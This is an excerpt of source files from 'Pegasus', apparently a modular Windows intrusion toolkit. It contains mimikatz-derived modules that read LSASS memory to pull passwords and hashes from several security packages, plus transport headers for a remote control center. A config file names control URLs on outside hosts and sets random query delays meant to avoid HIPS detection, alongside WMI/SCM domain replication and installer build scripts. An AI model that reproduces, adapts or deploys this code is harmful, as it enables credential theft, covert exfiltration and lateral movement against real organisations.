"\x00\x60\xd6\x0d\x07\x60\xda\x0c\x06\x7d\x25\xf6\xe0\x68\xd5"); 39 | 40 | PBYTE *pointeur = reinterpret_cast(&LiveGlobalLogonSessionList); 41 | if (HMODULE monModule = LoadLibrary(wszLivessp)) 42 | { 43 | MODULEINFO mesInfos; 44 | if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) 45 | { 46 | lp_genericPatternSearch(pointeur, wszLivessp, PTRN_WALL_LiveUpdatePasswordForLogonSessions, sizeof(PTRN_WALL_LiveUpdatePasswordForLogonSessions), OFFS_WALL_LiveUpdatePasswordForLogonSessions); 47 | *pointeur += pContext->pModLIVESSP->modBaseAddr - reinterpret_cast(mesInfos.lpBaseOfDll); 48 | } 49 | FreeLibrary(monModule); 50 | } 51 | 52 | my_free(wszLivessp); 53 | 54 | } 55 | return (pContext->pModLIVESSP && LiveGlobalLogonSessionList); 56 | } 57 | 58 | bool WINAPI getLiveSSPLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId) 59 | { 60 | if(searchLiveGlobalLogonSessionList(pContext)) 61 | { 62 | PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; 63 | BYTE * monBuffP = new BYTE[sizeof(KIWI_LIVESSP_LIST_ENTRY)], * monBuffC = new BYTE[sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)]; 64 | if(PKIWI_LIVESSP_LIST_ENTRY pLogSession = reinterpret_cast(lpgetPtrFromLinkedListByLuid(pContext, reinterpret_cast(LiveGlobalLogonSessionList), FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId))) 65 | { 66 | if (lp_readMemory(pLogSession, monBuffP, sizeof(KIWI_LIVESSP_LIST_ENTRY), pContext->hLSASS)) 67 | { 68 | pLogSession = reinterpret_cast(monBuffP); 69 | if(pLogSession->suppCreds) 70 | { 71 | if (lp_readMemory(pLogSession->suppCreds, monBuffC, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), pContext->hLSASS)) 72 | mesCreds = &(reinterpret_cast(monBuffC)->credentials); 73 | } //else wcout << L"n.s. (SuppCred KO) / "; 74 | } 75 | } 76 | #ifdef _DEBUG 77 | pContext->wszPackageName = L"livessp"; 78 | #endif 79 | lpgenericCredsToStream(pContext, mesCreds, TRUE); 80 | delete [] monBuffC, monBuffP; 81 | 82 | } //else { DbgPrint("ERR: livessp init failed"); } 83 | return true; 84 | } -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/livessp.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "..\LogonPasswords.h" 9 | 10 | 11 | typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL 12 | { 13 | DWORD isSupp; // 88h 14 | DWORD unk0; 15 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 16 | } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL; 17 | 18 | typedef struct _KIWI_LIVESSP_LIST_ENTRY 19 | { 20 | struct _KIWI_LIVESSP_LIST_ENTRY *Flink; 21 | struct _KIWI_LIVESSP_LIST_ENTRY *Blink; 22 | PVOID unk0; // 1 23 | PVOID unk1; // 0FFFFFFFFh 24 | PVOID unk2; // 0FFFFFFFFh 25 | PVOID unk3; // 0 26 | DWORD unk4; // 0 27 | DWORD unk5; // 0 28 | PVOID unk6; // 20007D0h 29 | LUID LocallyUniqueIdentifier; 30 | LSA_UNICODE_STRING UserName; 31 | PVOID unk7; // 2000010Dh 32 | PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds; 33 | } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY; 34 | 35 | 36 | 37 | VOID lssp_InitGlobals(); 38 | bool searchLiveGlobalLogonSessionList(LP_MODULE_CONTEXT *pContext); 39 | bool WINAPI getLiveSSPLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId); 40 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/msv1_0.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "../mod_mimikatz_sekurlsa.h" 9 | 10 | class mod_mimikatz_sekurlsa_msv1_0 { 11 | 12 | private: 13 | typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS { 14 | PVOID unk0; // next? 15 | LSA_UNICODE_STRING Primary; 16 | LSA_UNICODE_STRING Credentials; 17 | } KIWI_MSV1_0_PRIMARY_CREDENTIALS, *PKIWI_MSV1_0_PRIMARY_CREDENTIALS; 18 | 19 | typedef struct _KIWI_MSV1_0_CREDENTIALS { 20 | PVOID unk0; // next? 21 | DWORD AuthenticationPackageId; 22 | PVOID PrimaryCredentials; 23 | } KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS; 24 | 25 | typedef struct _KIWI_MSV1_0_LIST_5 { 26 | struct _KIWI_MSV1_0_LIST_5 *Flink; 27 | struct _KIWI_MSV1_0_LIST_5 *Blink; 28 | LUID LocallyUniqueIdentifier; 29 | LSA_UNICODE_STRING UserName; 30 | LSA_UNICODE_STRING Domaine; 31 | PVOID unk14; // 0 32 | PVOID unk15; // 0 33 | PVOID unk16; // offset unk_181A080 34 | DWORD unk17; // 0Ah 35 | DWORD unk18; // 2 36 | #ifdef _M_IX86 37 | DWORD unk19; 38 | #endif 39 | DWORD unk20; // 5AC4186Ch 40 | DWORD unk21; // 1CD6BFDh 41 | LSA_UNICODE_STRING LogonServer; 42 | PKIWI_MSV1_0_CREDENTIALS Credentials; 43 | PVOID unk22; // 0C14h 44 | PVOID unk23; // 0BFCh 45 | } KIWI_MSV1_0_LIST_5, *PKIWI_MSV1_0_LIST_5; 46 | 47 | typedef struct _KIWI_MSV1_0_LIST_6 { 48 | struct _KIWI_MSV1_0_LIST_6 *Flink; 49 | struct _KIWI_MSV1_0_LIST_6 *Blink; 50 | PVOID unk0; // unk_18457A0 51 | DWORD unk1; // 0FFFFFFFFh 52 | DWORD unk2; // 0 53 | PVOID unk3; // 0 54 | PVOID unk4; // 0 55 | PVOID unk5; // 0 56 | PVOID unk6; // 0C04h 57 | PVOID unk7; // 0 58 | PVOID unk8; // 0C08h 59 | PVOID unk9; // 0 60 | PVOID unk10; // 0 61 | DWORD unk11; // 0 62 | DWORD unk12; // 0 63 | PVOID unk13; // offset off_18456A0 64 | LUID LocallyUniqueIdentifier; 65 | LUID SecondaryLocallyUniqueIdentifier; 66 | LSA_UNICODE_STRING UserName; 67 | LSA_UNICODE_STRING Domaine; 68 | PVOID unk14; // 0 Windows 8 + 2*PVOID / 4*PVOID!! 69 | PVOID unk15; // 0 70 | PVOID unk16; // offset unk_181A080 71 | DWORD unk17; // 0Ah 72 | DWORD unk18; // 2 73 | #ifdef _M_IX86 74 | DWORD unk19; 75 | #endif 76 | DWORD unk20; // 5AC4186Ch 77 | DWORD unk21; // 1CD6BFDh 78 | LSA_UNICODE_STRING LogonServer; 79 | PKIWI_MSV1_0_CREDENTIALS Credentials; 80 | PVOID unk22; // 0C14h 81 | PVOID unk23; // 0BFCh 82 | } KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6; 83 | 84 | typedef struct _MSV1_0_PRIMARY_CREDENTIAL { 85 | LSA_UNICODE_STRING LogonDomainName; 86 | LSA_UNICODE_STRING UserName; 87 | BYTE NtOwfPassword[0x10]; 88 | BYTE LmOwfPassword[0x10]; 89 | BOOLEAN NtPasswordPresent; 90 | BOOLEAN LmPasswordPresent; 91 | wchar_t BuffDomaine[MAX_DOMAIN_LEN]; 92 | wchar_t BuffUserName[MAX_USERNAME_LEN]; 93 | } MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; 94 | 95 | static void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true); 96 | 97 | static PLIST_ENTRY LogonSessionList; 98 | static PULONG LogonSessionListCount; 99 | static bool searchLogonSessionList(); 100 | 101 | static bool decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity); 102 | public: 103 | static bool getMSV(vector * arguments); 104 | static bool WINAPI getMSVLogonData(__in PLUID logId, __in bool justSecurity); 105 | }; -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/ssp.cpp: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #include 8 | #include 9 | 10 | #include "..\lpmemory.h" 11 | #include "..\..\inc\dbg.h" 12 | #include "..\..\inc\mem.h" 13 | #include "..\..\inc\CryptoStrings.h" 14 | 15 | #include "ssp.h" 16 | 17 | PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList; 18 | 19 | VOID ssp_InitGlobals() 20 | { 21 | SspCredentialList = NULL; 22 | } 23 | 24 | bool searchSSPEntryList(LP_MODULE_CONTEXT *pContext) 25 | { 26 | LPWSTR wszMsv1_0; 27 | 28 | #ifdef _M_X64 29 | BYTE PTRN_WIN5_SspCredentialList[]= {0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; 30 | LONG OFFS_WIN5_SspCredentialList = sizeof(PTRN_WIN5_SspCredentialList) + 4 + 3; 31 | BYTE PTRN_WIN6_SspCredentialList[]= {0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15}; 32 | LONG OFFS_WIN6_SspCredentialList = sizeof(PTRN_WIN6_SspCredentialList) + 4 + 3; 33 | #elif defined _M_IX86 34 | BYTE PTRN_WALL_SspCredentialList[]= {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; 35 | LONG OFFS_WALL_SspCredentialList = sizeof(PTRN_WALL_SspCredentialList) + 4 + 1; 36 | #endif 37 | 38 | if (pContext->pModMSV && !SspCredentialList) 39 | { 40 | PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; 41 | pointeur= reinterpret_cast(&SspCredentialList); 42 | 43 | #ifdef _M_X64 44 | if (pContext->GLOB_Version.dwMajorVersion < 6) 45 | { 46 | pattern = PTRN_WIN5_SspCredentialList; 47 | taille = sizeof(PTRN_WIN5_SspCredentialList); 48 | offset = OFFS_WIN5_SspCredentialList; 49 | } 50 | else 51 | { 52 | pattern = PTRN_WIN6_SspCredentialList; 53 | taille = sizeof(PTRN_WIN6_SspCredentialList); 54 | offset = OFFS_WIN6_SspCredentialList; 55 | } 56 | #elif defined _M_IX86 57 | pattern = PTRN_WALL_SspCredentialList; 58 | taille = sizeof(PTRN_WALL_SspCredentialList); 59 | offset = OFFS_WALL_SspCredentialList; 60 | #endif 61 | wszMsv1_0 = CRSTRW("msv1_0", "\xff\xff\xd8\x09\xf9\xff\xd5\x12\xf9\xb6\x07\xb1\x95\x13\xf1"); 62 | 63 | if (HMODULE monModule = LoadLibrary(wszMsv1_0)) 64 | { 65 | MODULEINFO mesInfos; 66 | if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) 67 | { 68 | lp_genericPatternSearch(pointeur, wszMsv1_0, pattern, taille, offset); 69 | *pointeur += pContext->pModMSV->modBaseAddr - reinterpret_cast(mesInfos.lpBaseOfDll); 70 | } 71 | FreeLibrary(monModule); 72 | } 73 | //SspCredentialList = reinterpret_cast(0x77C5F230); 74 | 75 | my_free(wszMsv1_0); 76 | 77 | } 78 | return (SspCredentialList); 79 | } 80 | 81 | bool WINAPI getSSPLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId) 82 | { 83 | if (searchSSPEntryList(pContext)) 84 | { 85 | KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials; 86 | DWORD monNb = 0; 87 | if (lp_readMemory(SspCredentialList, &mesCredentials, sizeof(LIST_ENTRY), pContext->hLSASS)) 88 | { 89 | while(mesCredentials.Flink != SspCredentialList) 90 | { 91 | if (lp_readMemory(mesCredentials.Flink, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), pContext->hLSASS)) 92 | { 93 | if(RtlEqualLuid(logId, &(mesCredentials.LogonId))) 94 | { 95 | #ifdef _DEBUG 96 | pContext->wszPackageName = L"ssp"; 97 | #endif 98 | lpgenericCredsToStream(pContext, &mesCredentials.credentials, TRUE); 99 | monNb++; 100 | } 101 | } 102 | } 103 | } 104 | } //else { DbgPrint("ERR: ssp init failed"); } 105 | 106 | return true; 107 | } -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/ssp.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "..\LogonPasswords.h" 9 | 10 | 11 | typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY { 12 | struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink; 13 | struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Blink; 14 | ULONG References; 15 | ULONG CredentialReferences; 16 | LUID LogonId; 17 | ULONG unk0; 18 | ULONG unk1; 19 | ULONG unk2; 20 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 21 | } KIWI_SSP_CREDENTIAL_LIST_ENTRY, *PKIWI_SSP_CREDENTIAL_LIST_ENTRY; 22 | 23 | 24 | 25 | 26 | VOID ssp_InitGlobals(); 27 | bool searchSSPEntryList(LP_MODULE_CONTEXT *pContext); 28 | bool WINAPI getSSPLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId); 29 | 30 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/tspkg.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "..\LogonPasswords.h" 9 | 10 | 11 | typedef struct _KIWI_TS_PRIMARY_CREDENTIAL { 12 | PVOID unk0; // lock ? 13 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 14 | } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; 15 | 16 | typedef struct _KIWI_TS_CREDENTIAL { 17 | #ifdef _M_X64 18 | BYTE unk0[108]; 19 | #elif defined _M_IX86 20 | BYTE unk0[64]; 21 | #endif 22 | LUID LocallyUniqueIdentifier; 23 | PVOID unk1; 24 | PVOID unk2; 25 | PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; 26 | } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; 27 | 28 | VOID ts_InitGlobals(); 29 | 30 | bool searchTSPKGFuncs(LP_MODULE_CONTEXT *pContext); 31 | bool WINAPI getTsPkgLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId); 32 | 33 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/wdigest.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "..\LogonPasswords.h" 9 | 10 | 11 | typedef struct _KIWI_WDIGEST_LIST_ENTRY { 12 | struct _KIWI_WDIGEST_LIST_ENTRY *Flink; 13 | struct _KIWI_WDIGEST_LIST_ENTRY *Blink; 14 | DWORD UsageCount; 15 | struct _KIWI_WDIGEST_LIST_ENTRY *This; 16 | LUID LocallyUniqueIdentifier; 17 | } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY; 18 | 19 | 20 | // internal context structure 21 | typedef struct _WDIGEST_MODULE_CONTEXT { 22 | PKIWI_WDIGEST_LIST_ENTRY l_LogSessList; 23 | long offsetWDigestPrimary; 24 | } WDIGEST_MODULE_CONTEXT, *PWDIGEST_MODULE_CONTEXT; 25 | 26 | 27 | 28 | VOID wdig_InitGlobals(); 29 | bool searchWDigestEntryList(LP_MODULE_CONTEXT *pContext); 30 | bool WINAPI getWDigestLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId); 31 | -------------------------------------------------------------------------------- /Pegasus/mod_NetworkConnectivity/NetworkConnectivity.h: -------------------------------------------------------------------------------- 1 | /* 2 | NetworkConnectivity.h 3 | Headers file 4 | */ 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | VOID ncStartNetworkConnectivity(); 15 | 16 | 17 | // used by transport_Pipes.cpp 18 | LPWSTR nmlGetFreshestItem(); 19 | UINT64 ncGetMachineHash(); -------------------------------------------------------------------------------- /Pegasus/mod_NetworkConnectivity/mod_NetworkConnectivity.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_DomainReplication.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_NetworkConnectivity/transport_Pipes.h: -------------------------------------------------------------------------------- 1 | /* 2 | transport_Pipes.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | #include "transport_Generic.h" 10 | 11 | // definition of internal context structure to be used 12 | // while this transport is active 13 | typedef struct _TSPIPES_INTERNAL_CONTEXT { 14 | 15 | LPWSTR wszPipeProxyServer; // name of machine with working pipe proxy server. To be disposed at transport shutdown 16 | 17 | } TSPIPES_INTERNAL_CONTEXT, *PTSPIPES_INTERNAL_CONTEXT; 18 | 19 | PTRANSPORT_HANDLE tspipesInitTransport(); -------------------------------------------------------------------------------- /Pegasus/mod_NetworkConnectivity/transport_WinHTTP.h: -------------------------------------------------------------------------------- 1 | /* 2 | transport_WinHTTP.h 3 | */ 4 | 5 | #pragma once 6 | #include 7 | #include 8 | 9 | #include "transport_Generic.h" 10 | 11 | // internal structure assigned to global init context at TRANSPORT_HANDLE->pInternalModuleContext 12 | typedef struct _WHT_INTERNAL_CONTEXT { 13 | 14 | HINTERNET hSession; // opened WinHTTP session handle 15 | 16 | // wait-related vars 17 | WORD wWaitHour; // specifies a current hour, if it changes -> counter values are emptied 18 | DWORD dwQueryCountCurrentHour; // amount of queries issued in current hour 19 | DWORD dwMaxQueryCountSelected; // updated each hour with a random value from range [MAX_QUERIES_IN_HOUR_MIN..MAX_QUERIES_IN_HOUR_MAX] 20 | 21 | } WHT_INTERNAL_CONTEXT, *PWHT_INTERNAL_CONTEXT; 22 | 23 | typedef enum WHT_QUERY_TYPE { 24 | REQUEST_TYPE_GET = 1, 25 | REQUEST_TYPE_POST 26 | }; 27 | 28 | // type of connection used 29 | typedef enum WHT_CONNECTION_TYPE 30 | { 31 | CONNECTION_DIRECT = 0, // no proxy at all 32 | CONNECTION_WPAD_AUTOPROXY, // attempt WPAD proxy auto discovery 33 | CONNECTION_PROXY_CONFIGURED, // auto proxy retrieval as defined for WinHTTP 34 | CONNECTION_PROXY_DISCOVERED // proxy settings, discovered as a result of registry scan for all available user profiles 35 | }; 36 | 37 | // callback for tswhttpEnumUserProxy() 38 | typedef BOOL (CALLBACK *CBENUMUSERPROXY) (LPWSTR, LPVOID); 39 | 40 | HINTERNET _tswhttpTestConnection(WHT_CONNECTION_TYPE wcType, LPWSTR wszProxySetting); 41 | BOOL CALLBACK tswhttpTransportSend(PTRANSPORT_HANDLE pTransport, PTRANSPORT_QUERY pQuery); 42 | 43 | PTRANSPORT_HANDLE tswhttpInitTransport(); 44 | VOID CALLBACK tswhttpDisposeTransport(PTRANSPORT_HANDLE pTransport); -------------------------------------------------------------------------------- /Pegasus/shared/ModuleAPI.h: -------------------------------------------------------------------------------- 1 | /* 2 | ModuleAPI.h 3 | Headers with core<->modules api structures 4 | */ 5 | #pragma once 6 | 7 | #include 8 | 9 | #include "..\inc\HashedStrings.h" 10 | #include "..\inc\MyStringRoutines.h" 11 | #include "..\inc\CryptoStrings.h" 12 | #include "..\inc\RandomGen.h" 13 | 14 | #include "..\inc\PipeWorks.h" 15 | #include "..\inc\DomainListMachines.h" 16 | #include "..\inc\CredManager.h" 17 | #include "..\inc\EmbeddedResources.h" 18 | #include "..\inc\MailslotWorks.h" 19 | #include "..\shared\CommStructures.h" 20 | 21 | #include "..\inc\DataCallbackManager.h" 22 | 23 | 24 | 25 | // definition of a core APIs available to modules 26 | typedef struct _CORE_APIS_v10 27 | { 28 | // version code to use correct structure definition by modules 29 | WORD wCoreVersion; 30 | 31 | // api definitions of all funcs from libs, which may be used by modules 32 | 33 | // generic libraries 34 | HashedStrings_ptrs *HashedStrings_apis; 35 | MyStringRoutines_ptrs *MyStringRoutines_apis; 36 | CryptoStrings_ptrs *CryptoStrings_apis; 37 | RndClass_ptrs *RndClass_apis; 38 | 39 | // more specific libs 40 | PipeWorks_ptrs *PipeWorks_apis; 41 | DomainListMachines_ptrs *DomainListMachines_apis; 42 | CredManager_ptrs *CredManager_apis; 43 | EmbeddedResources_ptrs *EmbeddedResources_apis; 44 | MailslotWorks_ptrs *MailslotWorks_apis; 45 | 46 | // WDD - specific libs with exported functions 47 | DataCallbackManager_ptrs *DataCallbackManager_apis; // data callbacks management as a result of some network/pipe communication 48 | 49 | // functions to generate/manage common structures 50 | CommStructures_ptrs *CommStructures_apis; 51 | 52 | 53 | } CORE_API_v10, *PCORE_APIS_v10; 54 | 55 | // definition of a current apis version 56 | #define CORE_APIS CORE_API_v10 57 | -------------------------------------------------------------------------------- /Pegasus/shared/ModuleDescriptor.h: -------------------------------------------------------------------------------- 1 | /* 2 | ModuleDescriptor.h 3 | Definition of module descriptor and related structures 4 | Used by different modules 5 | */ 6 | 7 | #include 8 | 9 | 10 | 11 | // used at MODULE_DESCRIPTOR.bModuleClass 12 | typedef enum ENUM_MODULE_CLASSNAME 13 | { 14 | MODULE_CLASS_CORE = 0, // main core module, assumed to be only one - api for other modules, creds manager, local file storage 15 | MODULE_CLASS_AUTHCREDS_HARVESTER, // auth credentials harvesters - mimikatz, rdp files, prot storage, keylog analyzers, pre-defined creds 16 | MODULE_CLASS_REPLICATOR, // misc replication modules - domain enum and replicator, others 17 | MODULE_CLASS_EXPLOIT, // different exploits - rights elevation, etc 18 | MODULE_CLASS_NETWORK, // network communication modules - client, server, etc 19 | MODULE_CLASS_TASKWORKS, // misc task executors - file execution, console command output as a result of command found in local storage 20 | 21 | MODULE_CLASS_OTHER = 128, // some class-unrelated contents, especially for RES_TYPE_MODULE_RELATED or specific modules 22 | 23 | MODULE_CLASS_MAXVAL = 255 // definition of a max value as a BYTE 24 | }; 25 | 26 | -------------------------------------------------------------------------------- /Pegasus/shared/config.h: -------------------------------------------------------------------------------- 1 | /* 2 | config.h 3 | Shared project configuration file 4 | 5 | */ 6 | 7 | 8 | 9 | 10 | // name used as source for random generators used in object names. 11 | // Should be constant for all components inside one installation 12 | #define TARGET_BUILDCHAIN_HASH HASHSTR_CONST("test environment", 0x7393c9a643eb4a76) 13 | 14 | // numeric id of build (word value) to distinct target networks one from another 15 | // 1x - support.zakon-auto.net/tuning/ 16 | // 2x - mp3.ucrazy.org/music/ 17 | #define BUILD_ID 20 18 | 19 | 20 | // defines a amount of seconds to wait before module will check network connectivity 21 | // of a particular machine. Specified as a min-max range, a random value inside will be chosen 22 | // to prevent timeframe identification of software startup. 23 | // When delay finishes, network module attempts to query some urls 24 | // for release mode, 10-60 mins range suggested 25 | #define NETWORK_CHECK_ATTEMPT_DELAY_SEC_MIN 2 26 | #define NETWORK_CHECK_ATTEMPT_DELAY_SEC_MAX 5 27 | 28 | 29 | // if set to TRUE, remote network access will be issued only in usual working hours 30 | // according to local clock (9-00(+lag) - 19-00) 31 | // if undefined, this functionality will not be compiled at all 32 | //#define PRESERVE_WORKHOURS_NETWORK_ACCESS TRUE 33 | 34 | 35 | // values regulating amount and delays between networks requests. Should be reasonably low to avoid HIPS triggering 36 | // used by WinHTTP transport. Actual values are randomly selected from specified range each check time 37 | #ifndef _DEBUG 38 | 39 | // RELEASE VALUES 40 | #define MAX_QUERIES_IN_HOUR_MIN 10 41 | #define MAX_QUERIES_IN_HOUR_MAX 25 42 | #define WAIT_BETWEEN_QUERIES_SEC_MIN 8 43 | #define WAIT_BETWEEN_QUERIES_SEC_MAX 80 44 | 45 | #else 46 | 47 | #define MAX_QUERIES_IN_HOUR_MIN 100000 48 | #define MAX_QUERIES_IN_HOUR_MAX 250000 49 | #define WAIT_BETWEEN_QUERIES_SEC_MIN 2 50 | #define WAIT_BETWEEN_QUERIES_SEC_MAX 5 51 | 52 | #endif 53 | 54 | // amount of time (mins) a network thread should wait for in case of fQuery() attempt from transport failed 55 | #define WAIT_MINUTES_IF_NETWORK_COMMUNICATION_FAILED 13 56 | 57 | // how long tsgen should keep answer for remote queries from pipe clients without network access, in minutes 58 | // after this time, answer will be removed from queue to free resources 59 | #define REMOTE_CHUNK_ANSWER_TTL_MINS 20 60 | 61 | 62 | 63 | // disables https connectivity check in winhttp transport, which sometimes fails on winxp in test environment with 12175 error at WinHttpSendRequest() 64 | #define NO_HTTPS_ACCESS_CHECK_IN_TRANSPORT 65 | 66 | 67 | // experimental - include privilege escalation at IDD 68 | //#define DO_PRIVILEGE_ESCALATION 69 | 70 | 71 | // mod_NetworkConnectivity, transport_Generic 72 | // url of remote control center 73 | #define DEBUG_CONTROL_URL = L"http://denwer/pegasus/index.php"; 74 | #define RELEASE_CONTROL_URL = CRSTRW("http://mp3.ucrazy.org/music/index.php", "\xfd\xff\x43\x04\xd8\xff\x4b\x18\xf9\xf7\xf9\xa3\x42\x0a\x93\x9f\x63\x32\xe0\xbe\x4c\x5d\xda\xc2\x62\x75\x24\x23\x80\x92\x10\x45\xae\xe8\x6a\x22\xc9\xc2\x5b\x42\xfd\xef\xb3"); 75 | // CRSTRW("http://support.zakon-auto.net/tuning/index.asp", "xxx"); 76 | // CRSTRW("http://video.tnt-online.info/tnt-comedy-tv/stream.php", "xxx"); 77 | 78 | // replication methods used 79 | #define DOMAIN_REPLICATION_WMI 80 | #define DOMAIN_REPLICATION_SCM 81 | //#define DOMAIN_REPLICATION_RDP 82 | 83 | // replication settings - timeframe to restart replication to gather new hosts, in minutes 84 | #define REPLICATION_RESTART_MIN 20 85 | #define REPLICATION_RESTART_MAX 60 86 | 87 | 88 | // compile hardcoded creds, from target system (WorkDispatcher) 89 | //#define ADD_BUILTIN_CREDS -------------------------------------------------------------------------------- /Pegasus/tools/LZ4_pack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/tools/LZ4_pack.exe -------------------------------------------------------------------------------- /Pegasus/tools/MAKE_INSTALLERS.BAT: -------------------------------------------------------------------------------- 1 | rem @echo off 2 | cls 3 | rem MAKE_INSTALLERS.BAT 4 | rem rebuilds all project elements and prepares both x32 and x64 exes for usage 5 | 6 | rem Check param passed 7 | goto build_%1 8 | :build_ 9 | echo ERR: no param passed, expected 10 | exit 255 11 | 12 | :build_Release 13 | :build_Debug 14 | 15 | rebuild_core %1 16 | rebuild_modules %1 17 | 18 | echo Installers buildlog, mode %1 > installers_build.log 19 | 20 | devenv ..\Pegasus.sln /Rebuild "%1|x32" /project InstallerExe >> installers_build.log 21 | 22 | rem Check build result 23 | if %ERRORLEVEL% NEQ 0 ( 24 | echo ERROR rebuilding InstallerExe in mode %1 x32 25 | pause 26 | exit 255 27 | ) 28 | 29 | devenv ..\Pegasus.sln /Rebuild "%1|x64" /project InstallerExe >> installers_build.log 30 | 31 | rem Check build result 32 | if %ERRORLEVEL% NEQ 0 ( 33 | echo ERROR rebuilding InstallerExe in mode %1 x64 34 | pause 35 | exit 255 36 | ) -------------------------------------------------------------------------------- /Pegasus/tools/__file2bin.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | // test args 8 | //print_r($argv); die(); 9 | 10 | 11 | 12 | 13 | $g_Filename_in = $argv[1]; $g_Filename_out = $argv[2]; 14 | 15 | if (!file_exists($g_Filename_in)) { echo "ERR: input file {$g_Filename_in} not found"; die(); } 16 | //echo "Processing {$g_Filename_in} into {$g_Filename_out} "; 17 | 18 | $bin = file_get_contents($g_Filename_in); 19 | 20 | //mangle_file($bin); 21 | 22 | $len = strlen($bin); 23 | 24 | // form name 25 | $name = basename($g_Filename_out, ".h"); 26 | 27 | /* // query orig file's length into $len_orig by cutting last extension from passed input filename 28 | // usually input is filename.ext.lz4 29 | $fname_orig = substr($g_Filename_in, 0, strrpos($g_Filename_in, '.') ); 30 | $len_orig = 